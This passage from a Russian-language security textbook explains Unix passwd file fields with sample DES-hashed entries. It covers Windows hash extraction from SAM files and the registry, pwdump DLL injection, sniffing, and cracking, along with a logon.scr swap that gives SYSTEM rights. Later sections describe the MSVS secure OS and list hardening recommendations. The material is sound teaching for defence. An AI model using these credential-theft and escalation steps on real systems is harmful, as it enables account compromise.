michael:Mrd4OyzXJi/.o:500:500::/home/g.giraud:/bin/bash
142
nick:lreHgxVKYfqiU:501:501::/home/pages_web:/bin/bash
melisa:sDci0pnsqhhE6:502:502::/home/informix:/bin/bash
johnsonX9gnmqBDSQ/o:506:/home/pages_web:/bin/bash
dacosta:rGTGPVqn/AhuU:507:/home/pages_web:/bin/bash
То можно заметить, что данный пример более похож на правду.

Давайте разберемся на примере с пользователем "john":
john:653MWdpUGN3BM:66:1:John Nikolsen, 2-nd west:/home/john:/bin/sh
1. john - имя пользователя.

2. 653MWdpUGN3BM - пароль зашифрованный в DES.
3. 66:1 - номер пользователя в системе : номер рабочей группы (у root всегда 0:0).
4. John Nikolsen, 2-nd west - информация о пользователе (обычно Имя, Фамилия…).
5. /home/john - Домашний каталог.
6. /bin/csh - shell.
Теперь можно свободно разобрать passwd файл. Но сразу хотелось

бы отметить, что на файл в котором находятся пароли в DES (будь то
shadow или passwd), права в большинстве случаев дают r-------- или r—r-
----, это значит, что права на чтения есть у root'а и зарегистрированных
пользователей (во втором случае r—r-----). Так что, через какой-нибудь
htmlscript, вряд ли удастся просмотреть, но все таки иногда везет, и по-
лучается просмотреть все содержимое.
В Free BSD пароли хранятся в файле /etc/master.passwd , а в
остальном технология такая же как и в LINUX, хотя используется более
стойкий алгоритм шифрования MD5. В Open BSD, для шифрования ис-
пользуется алгоритм Blowfish.
3.4.2. Теория и практика аудита и восстановления паролей

Windows NT/2000/XP/Vista/Seven/Vista/Seven
Операционные системы Windows NT/2000/XP/Vista/Seven хранят
пароли в зашифрованном виде, называемом хэшами паролей (hash
(англ.) - смесь, мешанина). Пароли не могут быть получены непосред-
ственно из хэшей. Восстановление паролей заключается в вычислении
хэшей по возможным паролям и сравнении их с имеющимися хэшами
паролей. Аудит паролей включает в себя проверку возможных путей по-
лучения информации об учетных записях пользователей, результатом
восстановления паролей является их представление в явном виде с уче-
том регистра.
143
Получение хэшей паролей
Существует несколько путей получения хэшей паролей, зависящих
от их местонахождения и имеющегося доступа. Хэши паролей могут
быть получены следующими способами:
 из файла SAM или его резервной копии;
 непосредственно из реестра операционной системы локального
или удаленного компьютера;
 из реестра или Active Directory локального компьютера или уда-
ленного компьютера внедрением DLL;
 посредством перехвата аутентификационных пакетов в сети.
Получение хэшей паролей из файла SAM

Учетные записи пользователей, содержащие в том числе имя поль-
зователя и его пароль, хранятся в реестре Windows
NT/2000/XP/Vista/Seven/Vista/Seven, а именно в той его части, которая
находится в файле SAM (Security Account Manager) - диспетчер защиты
учетных записей). Этот файл можно найти на диске в каталоге
%SystemRoot%\system32\config, на диске аварийного восстановления си-
стемы или на резервной магнитной ленте.
К файлу SAM в каталоге %SystemRoot%\system32\config нельзя по-
лучить доступ, пока Windows загружена, так как он открыт операцион-
ной системой. Если имеется физический доступ к машине, необходимо
скопировать файл, загрузив на этой машине другую копию операцион-
ной системы или другую операционную систему. Если Windows NT
/2000/XP/Vista/Seven установлена на диске с файловой системой NTFS,
то для MS-DOS и Windows 95/98/Me дополнительно нужны программы,
обеспечивающие доступ к диску с NTFS из этих операционных систем.
В MS-DOS могут быть использованы NTFSDOS и NTFSDOS Profession-
al, в Windows 95/98/Me - NTFS for Windows 98.. Для доступа из операци-
онной системы Linux требуется включение поддержки NTFS. Также
можно загрузиться с дискеты и скопировать файл SAM, предварительно
запустив обеспечивающую доступ к разделам с NTFS программу. После
этого нужно выполнить импорт файла SAM. Извлечение хэшей паролей
из файла SAM было разработано и впервые реализовано в программе
SAMDump. При импорте файла SAM осуществляется получение списка
учетных записей пользователей, содержащихся в файле SAM. Процесс
импорта файла SAM подобен получению хэшей паролей методом
pwdump за исключением того, что вместо функций Windows API, обес-
печивающих работу с реестром Windows, используется их эмуляция.
144
При выполнении импорта файла SAM из программы SAMDump все не-
латинские буквы, имеющиеся в именах пользователей, будут искажены.
Программа LC+ лишена этого недостатка.
Другой способ получить файл SAM в операционной системе
Windows NT, причем не требующий перезагрузки машины, - это копи-
рование его из каталога %SystemRoot%\repair или с диска аварийного
восстановления. Каждый раз, когда в Windows NT создается диск ава-
рийного восстановления с помощью программы RDISK, файл SAM за-
паковывается и сохраняется в файл sam._, являющийся резервной копи-
ей файла SAM. Файл sam._ представляет из себя архив в формате
cabinet. Этот файл может быть распакован командой "expand sam._ sam".
Недостатком этого способа является то, что с момента создания диска
аварийного восстановления пароли могли измениться и, возможно, файл
sam._ содержит устаревшие данные. В программе LC+ имеется встроен-
ная возможность импорта файла SAM и из файла sam._, избавляющая от
необходимости использования программы expand. При импорте списка
учетных записей пользователей из файла sam._ он предварительно рас-
паковывается, затем выполняется непосредственно импорт файла SAM.
Файл SAM также копируется, когда создается полная резервная ко-
пия. Если имеется доступ к резервной копии, можно восстановить файл
SAM из %SystemRoot%\system32\config на другую машину и затем из-
влечь из него хэши паролей. Недостатком и этого способа также являет-
ся то, что с момента последнего сеанса создания резервной копии паро-
ли могли измениться.
Существует служебная программа SYSKEY, впервые появившаяся
в составе Service Pack 3 для Windows NT. Программа SYSKEY дополни-
тельно зашифровывает хэши паролей учетных записей, что делает им-
порт файла SAM вышеупомянутым способом бесполезным. SYSKEY
может использоваться в одном из трех вариантов:
 сгенерированный ключ шифрования записывается на локальный
жесткий диск в зашифрованном виде;
 сгенерированный ключ шифрования записывается на дискету, ко-
торая должна быть вставлена во время загрузки операционной си-
стемы;
 для получения ключа шифрования берется пароль, выбранный ад-
министратором и вводимый во время загрузки операционной си-
стемы.
Служебная программа SYSKEY в операционной системе Windows
NT для дополнительной защиты паролей учетных записей после уста-
145
новки Service Pack соответствующей версии должна быть активизирова-
на вручную. В операционных системах Windows 2000/XP/Vista/Seven
программа SYSKEY изначально присутствует и активизирована.
Получение хэшей паролей из реестра операционной системы
При получении хэшей паролей из реестра операционной системы
осуществляется непосредственный доступ к реестру. Для выполнения
импорта информации необходимо иметь административные права на
компьютере, дамп паролей учетных записей которого требуется создать.
Если компьютер не является локальным, то должен быть разрешен уда-
ленный доступ к реестру и иметься соответствующие права. Получение
хэшей данным способом впервые стало возможным в программе
pwdump. При выполнении импорта информации этим способом с помо-
щью программы pwdump имена пользователей, содержащие нелатин-
ские буквы, будут искажены. Для получения хэшей паролей из реестра
рекомендуется воспользоваться LC+.
Если программа SYSKEY активизирована, хэши паролей дополни-
тельно зашифровываются. Выполнение импорта при этом становится
бесполезным так же, как и импорт файла SAM, т.к. пароли по дополни-
тельно зашифрованным хэшам восстановлены не будут.
Получение хэшей паролей внедрением DLL
Данный метод был разработан и реализован в программе pwdump2.
Получение хэшей паролей методом pwdump2 возможно вне зависимости
от того, была активизирована программа SYSKEY, или нет. Для созда-
ния дампа паролей методом pwdump2 необходимо иметь право
SeDebugPrivilege. По умолчанию только пользователи группы админи-
страторов имеют его, поэтому нужно иметь административные права
для использования этого метода. Использование метода pwdump2 воз-
можно только на локальной машине.
Метод pwdump2 использует для создания дампа паролей способ,
называемый внедрением DLL. Один процесс вынуждает другой процесс
(lsass.exe), используя его идентификатор процесса, загружать DLL
(samdump.dll) и выполнять некоторый код из DLL в адресном простран-
стве другого процесса (lsass.exe). Загрузив samdump.dll в lsass (систем-
ная служба LSASS - Local Security Authority Subsystem), программа ис-
пользует тот же самый внутренний API, что msv1_0.dll, чтобы обратить-
ся к хэшам паролей. Это означает, что она может получить хэши без вы-
полнения таких действий, как перемещение их из реестра и дешифрова-
146
ние. Программа не заботится ни о том, каковы алгоритмы шифрования,
ни каковы ключи.
В версии программы pwdump2, поддерживающей Active Directory,
имеется ошибка, не позволяющая получить хэши паролей, если в опера-
ционной системе есть учетные записи с нелатинскими буквами в име-
нах. Получение хэшей паролей данным методом рекомендуется выпол-
нять в программе LC+.
Метод, использующийся в программе pwdump2, был доработан для
получения хэшей паролей не только с локальной, но и с удаленной ма-
шины в программах pwdump3/pwdump3e. На удаленный компьютер ко-
пируются исполняемый файл службы и файл DLL. После копирования
файлов на удаленном компьютере создается и запускается новая служба,
выполняющая те же действия, что и программа pwdump2 на локальном
компьютере. Далее выполняется удаление службы и файлов, ранее ско-
пированных. Передача информации об учетных записях пользователей
производится через раздел реестра на удаленном компьютере, временно
создаваемый и уничтожаемый после завершения копирования данных. В
программе pwdump3e выполняется дополнительное шифрование пере-
даваемых данных по алгоритму Diffie-Hellman для сохранения конфи-
денциальности при их возможном перехвате при передаче по сети. Ис-
пользование данного метода также требует административных прав на
той машине, информацию об учетных записях пользователей с которой
хочется получить.
При выполнении импорта информации этим способом с помощью
программ pwdump3/pwdump3e имена пользователей, содержащие нела-
тинские буквы, будут искажены. Для получения хэшей паролей с уда-
ленного компьютера внедрением DLL рекомендуется воспользоваться
LC+.
Если административные права на локальном компьютере отсут-
ствуют, можно воспользоваться уязвимостью операционных систем
Windows NT/2000/XP/Vista/Seven, заключающейся в замене экранной
заставки, запускаемой при отсутствии регистрации пользователя опера-
ционной системы в течение некоторого времени (по умолчанию интер-
вал времени составляет 15 минут для Windows NT/2000, 10 минут - для
Windows XP). Для этого файл %SystemRoot%\system32\logon.scr заменя-
ется на требуемый исполняемый файл (например, cmd.exe), который бу-
дет запущен операционной системой вместо экранной заставки с права-
ми системы. Замена может быть выполнена способом, используемым
при копировании файла SAM. Доступ к диску с NTFS с возможностью
147
записи осуществим с помощью NTFSDOS Professional или NTFS for
Windows 98. Далее выполняются действия по получению хэшей методом
pwdump2 или pwdump3/pwdump3e.
Перехват аутентификационных пакетов в сети
Даже если программа SYSKEY установлена и активизирована, не
имеется необходимого доступа к удаленному или локальному компью-
теру, существует возможность получения хэшей паролей учетных запи-
сей пользователей. Этим способом является перехват аутентификацион-
ных пакетов в сети (sniffing (англ.) - вынюхивание). Клиентская машина
обменивается с сервером аутентификационными пакетами каждый раз,
когда требуется подтверждение прав пользователя. Необходимо, чтобы
компьютер находился в сетевом сегменте пользователя или ресурса, к
которому он обращается. Программа для перехвата аутентификацион-
ных пакетов (sniffer (англ.) - вынюхиватель), встроенная в LC+, работает
на машинах с Ethernet-адаптером и в Windows NT/2000/XP/Vista/Seven, и
в Windows 95/98/Me. Программу LC+ в режиме перехвата аутентифика-
ционных пакетов нужно оставить запущенной на некоторое время для
сбора достаточного количества хэшей паролей. Полученные данные
необходимо сохранить в файл, после чего в программе LC+ выполнить
импорт файла сеанса LC+.
Для препятствования получения хэшей паролей этим способом
фирмой Microsoft было разработано расширение существующего меха-
низма аутентификации, называемое NTLMv2. Его использование стано-
вится возможным после установки Service Pack, начиная с Service Pack 4
для Windows NT.
Восстановление паролей
Пароль может быть получен различными способами: атакой по сло-
варю, последовательным перебором и гибридом атаки по словарю и по-
следовательного перебора.
При атаке по словарю последовательно вычисляются хэши для
каждого из слов словаря или модификаций слов словаря и сравниваются
с хэшами паролей каждого из пользователей. При совпадении хэшей па-
роль найден. Преимущество метода - его высокая скорость. Недостатком
есть то, что таким образом могут быть найдены только очень простые
пароли, которые имеются в словаре или являются модификациями слов
словаря.
Последовательный перебор комбинаций (brute force (англ.) - грубая
сила (дословно), решение "в лоб") использует набор символов и вычис-
148
ляет хэш для каждого возможного пароля, составленного из этих симво-
лов. При использовании этого метода пароль всегда будет определен,
если составляющие его символы присутствуют в выбранном наборе.
Единственный недостаток этого метода - большое количество времени,
которое может потребоваться на определение пароля. Чем большее ко-
личество символов содержится в выбранном наборе, тем больше време-
ни может пройти, пока перебор комбинаций не закончится.
При восстановлении паролей гибридом атаки по словарю и после-
довательного перебора к каждому слову или модификации слова слова-
ря добавляются символы справа и/или слева. Для каждой получившейся
комбинации вычисляется хэш, который сравнивается с хэшами паролей
каждого из пользователей.
После получения хэшей паролей можно начать восстановление па-
ролей. Двумя основными типами файла, содержащими хэши паролей,
являются PwDump- (passwords dump (англ.) - дамп паролей) и Sniff-
файл.
Каждая строка PwDump-файла имеет следующий формат:
"ИмяПользователя: RID: LM-хэш: NT-хэш:
ПолноеИмя,Описание: ОсновнойКаталогПользователя:"
Каждая из 7-символьных половин пароля зашифрована независимо
от другой в LM-хэш по алгоритму DES (бывший федеральный стандарт
США), NT-хэш получается в результате шифрования всего пароля по
алгоритму MD4 (фирмы RSA Security, Inc.). LM-хэш содержит инфор-
мацию о пароле без учета регистра (в верхнем регистре), а NT-хэш - с
учетом регистра. После имени пользователя имеется уникальный иден-
тификатор учетной записи RID (relative identifier (англ.) - относительный
идентификатор), который для получения хэшей не используется. Иден-
тификатор встроенной учетной записи администратора равен 500, госте-
вой учетной записи - 501. LM-хэш присутствует для совместимости с
другими операционными системами (LAN Manager, Windows for
Workgroups, Windows 95/98/Me и т.д.). Его наличие упрощает восста-
новление паролей. Если длина NT-пароля превышает 14 символов, LM-
хэш соответствует пустому паролю. При существовании LM-хэша вос-
становление сначала осуществляется по LM-хэшу, после нахождения
LM-пароля используется NT-хэш для определения NT-пароля.
Каждая строка Sniff-файла имеет следующий формат:
"ИмяПользователя:3:ЗапросСервера:LM-ответ: NT-ответ"
149
LM-ответ получается в результате шифрования LM-хэша, NT-ответ
- в результате шифрования NT-хэша. Шифрование выполняется по алго-
ритму DES таким образом, что определить LM- и NT-пароль можно
только при проверке всего пароля. Кроме того, в каждом случае исполь-
зуется свой запрос сервера. Поэтому на определение паролей по Sniff-
файлу потребуется значительно больше времени.
При использовании нелатинских букв в пароле для восстановления
паролей рекомендуется использовать LC+.
Изменение паролей пользователей без их восстановления
Если восстановление паролей пользователей Windows
NT/2000/XP/Vista/Seven не требуется, возможно их изменение при име-
ющемся доступе к локальному компьютеру. Изменение паролей делает-
ся с помощью программы Offline NT Password & Registry Editor . Вы-
полняется загрузка с дискеты с операционной системой Linux, выбор
пользователя для изменения пароля, вычисление хэша пароля и модифи-
кация файла SAM на диске с операционной системой. Программа под-
держивает Windows NT/2000/XP/Vista/Seven, в т.ч. с активизированной
служебной программой SYSKEY.
Дополнительные возможности получения информации о паролях
Если в сети есть машины с установленными на них операционными
системами Windows 3.11, Windows for Workgroups или Windows
95/98/Me, то имеются дополнительные возможности получения инфор-
мации о паролях.
Как было отмечено ранее, по умолчанию в этих операционных си-
стемах выполняется кэширование паролей пользователей на диск в фай-
лы %WinDir%\.pwl. Пароли хранятся в зашифрованном виде, причем ре-
гистр букв игнорируется (всегда используется верхний регистр). Алго-
ритм шифрования паролей начиная с Windows 95 OSR2 был изменен,
так как была исправлена обнаруженная ошибка, поэтому восстановить
пароли из старых PWL-файлов значительно проще. Для этого могут
быть применены программы Glide, PWL_Key, PwlHack, PwlTool. Для
восстановления паролей из новых PWL-файлов можно использовать
PwlHack или PwlTool.
При разрешенном кэшировании паролей с момента входа и реги-
страции пользователя в Windows и до момента выхода пароли можно
определить, запустив программу PwlView. Показываются кэшируемые
пароли на локальной машине для текущего пользователя, используя
недокументированные функции Windows API.
150
Если пользователь Windows NT/2000/XP/Vista/Seven является одно-
временно пользователем Windows 3.11, Windows for Workgroups или
Windows 95/98/Me и будет определен его пароль (как пользователя
Windows 3.11, Windows for Workgroups или Windows 95/98/Me), в кото-
ром, как уже упоминалось ранее, содержатся только символы верхнего
регистра, то с помощью LC+4 пароль Windows NT/2000/XP/Vista/Seven
может быть легко определен. Необходимо в качестве известных симво-
лов пароля указать символы ранее определенного пароля пользователя
Windows 3.11, Windows for Workgroups или Windows 95/98/Me.
3.4.3. Защитные механизмы ОС МСВС
Обобщенная структура защищенных информационных технологий

на сегодняшний день включает четыре главных компонента:
 защищенную операционную систему (ЗОС) “Мобильная Система
Вооруженных Сил” (МСВС 3.0);
 защищенную систему управления базами данных “Линтер-ВС”
6.0;
 программные средства общего применения (обеспечения повсе-
дневной деятельности должностных лиц силовых ведомств, распреде-
ленной гипертекстовой обработки данных и средств разработки прило-
жений);
 средства защиты информации.
В целом, под программным обеспечением защищенных информа-
ционных технологий понимают совокупность программ, описаний и ин-
струкций, предназначенных для управления вычислительным процессом
персонального компьютера в среде МСВС, решение и отладку информа-
ционных и расчетных задач.
Основными функциями ПО защищенных информационных техно-
логий являются:
 планирование и организация функционирования ПК;
 контроль функционирования ПК;
 автоматизация процесса разработки программ;
 обеспечение решения информационных и расчетных задач.
ПО ПК защищенных информационных технологий условно разби-
вается на две части:
 общее программное обеспечение защищенных информационных
технологий;
151
 прикладное программное обеспечение защищенных информаци-
онных технологий.
Общее программное обеспечение защищенных информационных
технологий с самых общих позиций предназначено для эффективной ор-
ганизации подготовки к решению и самого решения информационных и
расчетных задач, а также для организации и контроля вычислительного
процесса ПК при ее функционировании. Общее программное обеспече-
ние позволяет пользователю создавать любые прикладные программные
средства и управлять работой компьютера.
Состав и структура мобильной ОС
Защищенная ОС МСВС - это мобильная, многопользовательская,
многозадачная операционная система, поддерживающая симметричные
многопроцессорные архитектуры и работающая как в режиме команд-
ной строки, так и в режиме графического интерфейса.
Основное назначение ОС МСВС - управление ресурсами системы и
процессами, использующими эти ресурсы при вычислениях.
ОС МСВС – отечественная защищенная ОС. Используется для по-
строения на ее основе защищенных информационных систем. Обладает
развитыми средствами управления доступом пользователей к ресурсам
ОС, включающими механизмы мандатного, дискреционного и ролевого
Помимо развития средств защиты, совершенствования базовых
функциональных возможностей и расширения поддержки современных
устройств, для ОС МСВС были сделаны значительные доработки по ча-
сти интерфейса пользователя и администратора системы, а также по ру-
сификации системы.
Кроме того, на базе ОС МСВС разработана защищенная операци-
онная система «Оливия», предназначенная для интегрирования в ком-
плексную систему обеспечения безопасности мобильного компонента
автоматизированных систем управления силовых ведомств, для встраи-
вания и взаимодействия со средствами криптографической защиты ин-
формации.
Таким образом, ОС МСВС - это универсальное инструментальное
средство для управления техническими средствами и задачами. Это
многопользовательская многозадачная ОС, которая может быть исполь-
зована как в качестве базового ПО сервера, так и в качестве ОС графи-
ческой рабочей станции.
ОС МСВС 3.0 как программное изделие поставляется в виде загру-
зочного модуля и комплекта эксплуатационной документации. Загру-
152
зочный модуль поставляется на CD-ROM, а комплект эксплуатационной
документации на бумажном носителе.
Данная операционная система относится к системам класса UNIX.
Это означает, что ОС МСВС 3.0 не только поддерживает многопользо-
вательскую многозадачную работу в режиме разделения времени, но и
имеет виртуальную организацию памяти, обладает сетевой прозрачно-
стью. При разработке ОС МСВС учитывался стандарт LSB (Linux
Standard Base).
ОС МСВС, как и совместимая с нею ЗОС «Оливия», может быть
загружена как с внутренних устройств хранения, так и со сменных
носителей.
В состав ОС МСВС входят четыре комплекса:
 базовая конфигурация ОС;
 система графического интерфейса;
 система защиты от НСД;
 средства разработки.
Рассмотрим их детальнее.
Комплекс "Базовая конфигурация ОС". Данный комплекс предна-
значен для выполнения основных функций ОС и по существу является
самой ОС, в которой отсутствуют система графического интерфейса, си-
стема защиты от несанкционированного доступа и средства разработки.
В состав комплекса "Базовая конфигурация ОС" входят четыре компо-
нента:
 ядро и окружение;
 системные утилиты;
 системные библиотеки;
 средства установки.
Комплекс "Базовая конфигурация ОС" может иметь самостоятель-
ное применение в тех случаях, когда пользователь не нуждается в спе-
циальных средствах защиты информации, средствах разработки про-
грамм и вся работа пользователя осуществляется в режиме командной
строки. Для функционирования этого комплекса требуется значительно
меньше вычислительных ресурсов, чем для функционирования ОС
МСВС 3.0.
Комплекс "Система графического интерфейса" предназначен для
организации выполнения прикладных задач в режиме графического
интерфейса.
153
Для МСВС 3.0, как и для всех ОС семейства UNIX, стандартом
графического интерфейса является система X-Window System (далее по
тексту X-Window)..
Система графического интерфейса (СГИ) обеспечивает многоокон-
ный графический режим работы в среде ОС МСВС в режиме разделения
времени, который разрешает одновременное использование на одном
экране нескольких прикладных программ, находящихся на одном или
нескольких узлах локальной вычислительной сети. СГИ предоставляет
пользователям набор интерфейсных программ, позволяющих создавать
различные прикладные программы.
СГИ является мощным средством для разработки и создания совре-
менного графического интерфейса отдельных прикладных программ и
при этом дает возможность отображать на одном экране графического
дисплея результаты решения прикладных программ, выполняющихся на
различных узлах ЛВС. В основе СГИ используется модель взаимодей-
ствия клиент/сервер, которая состоит из трех взаимосвязанных частей:
 сервера, который управляет графическим дисплеем, клавиатурой и
мышью;
 программ-клиентов, которые обращаются к серверу для выполне-
ния определенных действий над окнами;
 канала связи, который использует программы-клиенты и сервер
для общения между собой.
Сервер системы графического интерфейса - это программа СГИ,
которая запускается на ЭВМ и непосредственно управляет графическим
дисплеем, клавиатурой и мышью. Именно сервер умеет воспринимать и
обрабатывать сигналы, приходящие от клавиатуры, мыши и программ-
клиентов. Сервер может исполняться на той же машине, что и клиент,
или на другой машине.
Клиент системы графического интерфейса - это прикладная про-
грамма СГИ, использующая возможности оконной системы. Прикладная
программа называется клиентом, так как она пользуется услугами серве-
ра - она обращается к серверу с запросами на выполнение тех или иных
действий.
СГИ позволяет нескольким клиентам исполняться одновременно.
Например, в одном окне редактируется текст, в другом окне в данное
время компилируется программа, в третьем окне отображается текущее
время, а в четвертом окне показывается средняя загрузка системы.
154
Хотя клиенты могут отображать результаты и получать ввод только
от одного сервера, клиенты могут выполняться на различных компьюте-
рах сети.
Канал связи используется клиентом для передачи запросов серверу,
а сервером - для передачи информации клиенту. Поддержка данной свя-
зи встроена в базовую библиотеку СГИ, называемую библиотекой Xlib..
В результате все клиенты, использующие библиотеку Xlib, получают
доступ к имеющимся методам связи.
В СГИ клиент выполняется на той же ЭВМ, что и сервер, либо на
удаленной ЭВМ, а графический дисплей (вместе с клавиатурой и мы-
шью) с управляющим сервером - на основной ЭВМ. В случае с удален-
ной ЭВМ они взаимодействуют по сети, используя протокол TCP/IP.
При этом сервер и клиент полностью отделены друг от друга, а архитек-
турная взаимосвязь компонент клиента и сервера СГИ через Х-протокол.
Рассмотрим принцип работы пользователя в системе графического
интерфейса. Пользовательская среда СГИ служит для удобного взаимо-
действия пользователя с ОС МСВС и с прикладными программами, а
также обеспечивает непротиворечивый, графически ориентированный
пользовательский интерфейс.
Пользовательская среда СГИ включает следующие компоненты:
 администратор окон;
 прикладные программы СГИ.
Возможности администратора окон состоят в следующем.
При запуске прикладных программ и создании окон, пользователь
может изменить размер окон, переместить окна поместить их на дно
стека, вытолкнуть окна из вершины стека. Можно также использовать
администратор окон для свертки окон в пиктограммы.
СГИ включает различные прикладные программы, разработанные
для повышения производительности и удобства работы пользователя. К
числу прикладных программ СГИ относятся следующие:
 bitmap, bmtoa, atobm - программы создания, редактирования и
преобразования растрового образа;
 xcalc - калькулятор;
 xcalendar - календарь с записной книжкой;
 xclipboard - работа с текстовым буфером;
 xclock - отображение времени (часы);
 xcmdmenu - меню команд обслуживающих программ;
 xfm - файловый менеджер;
155
 xfontsel - интерактивная программа для выбора шрифта;
 xkiil - снятие программы с выполнения;
 xload - отображение загрузки системы;
 xmag - увеличение части экрана;
 xmem - отображение занятости оперативной памяти;
 xmessage - отображение сообщения или запроса в окне;
 xset - установка характеристик дисплея;
 xsetroot - изменение свойств корневого окна.
Комплекс "Система защиты от НСД" предназначен для обеспечения
информационной безопасности. В состав комплекса "Система защиты от
НСД" входят: средства защиты и утилиты настройки средств защиты от
НСД.
Компонент "Средства защиты от НСД" обеспечивает работу
средств защиты и содержит:
 ядро ОС МСВС со встроенной системой защиты;
 утилиты для первоначальной инициализации системы защиты и
задания первоначальных установок;
 программу для протоколирования сообщений системы защиты и
программу контроля целостности файловой системы.
Компонент "Утилиты настройки средств защиты от НСД" обеспе-
чивает настройку средств защиты и содержит:
 утилиты для настройки параметров межсетевых экранов;
 утилиты для настройки системы защиты ОС МСВС 3.0;
 руководства пользователя для системы "man" по утилитам
администрирования и системным вызовам ядра, относящимся к системе
защиты;
 утилиту для настройки программы контроля целостности файло-
вой системы.
Комплекс "Средства разработки" предназначен для разработки при-
кладных программ.
В состав комплекса "Средства разработки" входят три компоненты:
 языки программирования;
 утилиты средств разработки;
 библиотеки средств разработки.
Языками программирования комплекса являются:
 язык командного интерпретатора shell,
 язык С,
 язык C++,
156
 язык Perl.
Утилиты комплекса «Средства разработки» предназначены для
обеспечения работы программиста в среде ОС МСВС 3.0 и включают в
себя:
 интерпретатор командного языка shell,
 компилятор C/C++,
 редактор связей ld,
 построитель программ make,
 отладчик gdb,
 текстовые редакторы ed, sed, Vi и emacs,
 интерпретатор языка Perl, набор обслуживающих программ ar, nm,
ranlib, size, strip.
Библиотеки комплекса «Средства разработки» предназначены для
вызова или включения различных подпрограмм, необходимых при раз-
работке программы. Эти библиотеки являются неотъемлемой частью
языков и комплекса «Средства разработки программного обеспечения».
Командный язык (shell) является основным инструментом интерак-
тивной работы пользователя за терминалом. После подключения поль-
зователю (в соответствии с его привилегиями) доступен весь набор
имеющихся команд. Диалог пользователя с ОС МСВС поддерживается
интерпретатором команд shell.
Включенные в состав комплекса «Средства разработки» средства
программирования на языках C/C++ предлагают пользователям язык
Ассемблера, языки С и C++, компилятор, библиотеки, редактор связей,
отладчик.
3.5. Рекомендации по повышению эффективности па-

рольной защиты
3.5.1. Рекомендации администратору Windows

NT/2000/XP/Vista/Seven
На ПЭВМ с Windows NT/2000/XP/Vista/Seven:
1) сделать недоступным для вскрытия системный блок компьютера для
предотвращения возможного отключения жесткого диска с опера-
ционной системой или подключения другого диска;
2) в Setup разрешить загрузку только с жесткого диска, чтобы не допу-
стить загрузку с другого носителя;
157
3) установить пароль на вход в Setup, не позволяя отменить запрет на за-
грузку с другого носителя;
4) Windows NT/2000/XP/Vista/Seven должна быть единственной опера-
ционной системой, установленной на машине, что делает невоз-
можным копирование и замену файлов из других операционных
систем;
5) использовать только файловую систему NTFS, отказаться от исполь-
зования FAT и FAT32;
6) удостовериться в Windows NT, что установлен Service Pack 3 или бо-
лее поздний и активизирована служебная программа SYSKEY;
7) использовать встроенную в операционные системы Windows 2000/XP
возможность шифрования файлов посредством EFS (Encrypting File
System (англ.) - файловая система с шифрованием), являющейся ча-
стью NTFS5;
8) запретить удаленное управление реестром, остановив соответствую-
щую службу;
9) отменить использование особых общих папок ADMIN$, C$ и т.д.,
позволяющих пользователю с административными правами под-
ключаться к ним через сеть. Для этого необходимо добавить в ре-
естр параметр AutoShareWks (для версий Workstation и Prosessional)
или AutoShareServer (для версии Server) типа DWORD и установить
его в 0 в разделе:
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanmanSer
ver\Parameters
Диапазон: 0-1, по умолчанию – 1
0 - не создавать особые общие ресурсы;
1 - создавать особые общие ресурсы;
10) запретить или максимально ограничить количество совместно ис-
пользуемых сетевых ресурсов;
11) ограничить анонимный доступ в операционных системах Windows
NT/2000, позволяющий при анонимном подключении получать ин-
формацию о пользователях, политике безопасности и общих ресур-
сах. В Windows NT/2000 нужно добавить в реестр параметр
RestrictAnonymous типа DWORD в разделе:
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\LSA
Диапазон: 0-2, по умолчанию - 0 для Windows NT/2000, 1 - для Windows XP.
0 - не ограничивать, положиться на заданные по умолчанию раз-
решения;
158
1 - не разрешать получать список учетных записей и имен пользо-
вателей;
2 - не предоставлять доступ без явных анонимных разрешений
(недоступно в Windows NT);
12) если в сети отсутствуют клиенты с Windows for Workgroups и
Windows 95/98/Me, то рекомендуется отключить LM-
аутентификацию, так как это существенно затруднит восстановле-
ние паролей при перехвате аутентификационных пакетов зло-
умышленником. Если же такие клиенты присутствуют, то можно
включить использование аутентификации только по запросу серве-
ра. Это можно сделать, активизировав расширение механизма
аутентификации NTLMv2. Для его активизации необходимо доба-
вить в реестр следующие параметры:
LMCompatibilityLevel типа DWORD в разделе
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\LSA
Диапазон: 0-5, по умолчанию - 0.
0 - посылать LM- и NT-ответы, никогда не использовать аутенти-
фикацию NTLMv2;
1 - использовать аутентификацию NTLMv2, если это необходимо;
2 - посылать только NT-ответ;
3 - использовать только аутентификацию NTLMv2;
4 - контроллеру домена отказывать в LM-аутентификации;
5 - контроллеру домена отказывать в LM- и NT-аутентификации
(допустима только аутентификация NTLMv2).
NtlmMinClientSec или NtlmMinServerSec типа DWORD в разделе:
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\LSA\MSV1_0
Диапазон: объединенные по логическому ИЛИ любые из следующих
значений:
0x00000010 - целостность сообщений;
0x00000020 - конфиденциальность сообщений;
0x00080000 - безопасность сеанса NTLMv2;
0x20000000 - 128-битное шифрование;
13) запретить отображение имени пользователя, который последним
регистрировался в операционной системе, в диалоговом окне реги-
страции. Для этого нужно добавить в реестр строковый параметр
DontDisplayLastUserName и установить его в 1 в разделе:
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT\CurrentVersio
n\Winlogon
Диапазон: 0-1, по умолчанию - 0.
159
0 - отображать имя последнего пользователя;
1 - не отображать имя последнего пользователя;
14) запретить запуск экранной заставки при отсутствии регистрации
пользователя операционной системы в течение некоторого време-
ни. Для этого нужно в реестре значение параметра
ScreenSaveTimeOut установить в 0 в разделе:
HKEY_USERS\.DEFAULT\Control Panel\Desktop;
15) не выбирать в качестве пароля или части пароля любое слово, кото-
рое может являться словом словаря или его модификацией;
16) длина пароля в Windows NT должна быть не менее 7 символов (при
максимально возможной длине пароля в 14 символов), в Windows
2000/XP - более 14 символов (при максимально возможной длине
пароля в 128 символов);
17) пароль должен содержать символы из возможно большого сим-
вольного набора. Нельзя ограничиваться только символами A-Z,
желательнее использовать в пароле и буквы, и цифры, и специаль-
ные символы (причем в каждой из 7-символьных половин пароля,
если длина пароля менее или равна 14);
18) символы пароля, являющиеся буквами, должны быть как верхнего,
так и нижнего регистра, что затруднит восстановление пароля, про-
изводимое по NT-хэшу;
19) своевременно выполнять установку пакетов исправлений и обнов-
лений операционной системы;
20) переименовать административную и гостевую учетные записи, от-
ключив при этом последнюю;
21) избегать наличия учетной записи с именем и паролем, совпадаю-
щими с административной, на другом компьютере в качестве
обычной учетной записи;
22) иметь только одного пользователя с административными правами;
23) задать политику учетных записей (блокировку учетных записей по-
